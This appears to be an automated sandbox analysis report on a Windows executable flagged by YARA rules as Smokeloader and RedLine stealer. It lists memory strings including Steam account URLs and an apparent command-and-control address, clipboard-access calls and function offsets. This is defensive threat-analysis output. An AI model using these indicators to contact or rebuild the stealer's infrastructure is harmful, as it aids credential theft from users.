      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.co
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716776835.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453277618.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445292856.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445194070.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716924081.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453277618.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716924081.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api2
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453277618.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445292856.000000000069F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445194070.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716924081.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453145013.000000000064F000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716776835.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi#
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowe
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
      Source: NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.9:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49733 version: TLS 1.2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004088500_2_00408850
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0040ACF00_2_0040ACF0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004238600_2_00423860
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004388100_2_00438810
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041682D0_2_0041682D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004288CB0_2_004288CB
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043D8800_2_0043D880
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004218A00_2_004218A0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004309400_2_00430940
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004039700_2_00403970
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004209390_2_00420939
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004179C10_2_004179C1
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004231C20_2_004231C2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004241C00_2_004241C0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043B1D00_2_0043B1D0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004291DD0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043D9800_2_0043D980
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004059900_2_00405990
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004221900_2_00422190
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043D9970_2_0043D997
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043D9990_2_0043D999
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004091B00_2_004091B0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042CA490_2_0042CA49
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042DA530_2_0042DA53
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004162630_2_00416263
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0040EA100_2_0040EA10
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004152200_2_00415220
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042CAD00_2_0042CAD0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004252DD0_2_004252DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041B2E00_2_0041B2E0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004062800_2_00406280
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043DA800_2_0043DA80
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041E2900_2_0041E290
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041CB400_2_0041CB40
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043D34D0_2_0043D34D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00426B500_2_00426B50
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043DB600_2_0043DB60
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00436B080_2_00436B08
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042830D0_2_0042830D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042CB110_2_0042CB11
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004043200_2_00404320
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042CB220_2_0042CB22
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004253270_2_00425327
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004083300_2_00408330
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043F3300_2_0043F330
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042A33F0_2_0042A33F
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0040DBD90_2_0040DBD9
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004243800_2_00424380
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041FC750_2_0041FC75
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041DC000_2_0041DC00
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00429C2B0_2_00429C2B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004291DD0_2_004291DD
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004074F00_2_004074F0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041148F0_2_0041148F
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042AC900_2_0042AC90
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043ECA00_2_0043ECA0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0040CD460_2_0040CD46
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004375000_2_00437500
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004225100_2_00422510
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00417DEE0_2_00417DEE
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00437DF00_2_00437DF0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004095800_2_00409580
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041759F0_2_0041759F
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00425E700_2_00425E70
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00436E740_2_00436E74
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004276030_2_00427603
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00425E300_2_00425E30
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004286C00_2_004286C0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043AEC00_2_0043AEC0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004266D00_2_004266D0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004236E20_2_004236E2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00405EE00_2_00405EE0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041DE800_2_0041DE80
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00402F500_2_00402F50
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00420F500_2_00420F50
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00438F590_2_00438F59
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004067100_2_00406710
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00423F200_2_00423F20
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043F7200_2_0043F720
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00419F300_2_00419F30
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0041E7C00_2_0041E7C0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004197C20_2_004197C2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0042DFE90_2_0042DFE9
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0040A7800_2_0040A780
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_00411F900_2_00411F90
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004187920_2_00418792
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004157990_2_00415799
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0043EFB00_2_0043EFB0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007480570_2_00748057
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007280550_2_00728055
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072E0E70_2_0072E0E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007360D70_2_007360D7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007470DB0_2_007470DB
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007331660_2_00733166
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007161470_2_00716147
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0074B1270_2_0074B127
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007221F70_2_007221F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007311B70_2_007311B7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072A1970_2_0072A197
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0073E2500_2_0073E250
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072D2300_2_0072D230
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0074F2170_2_0074F217
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007323F70_2_007323F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007394440_2_00739444
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007194170_2_00719417
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072E4F70_2_0072E4F7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_007164E70_2_007164E7
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0072B5470_2_0072B547
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0073351D0_2_0073351D
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_0074D5B40_2_0074D5B4
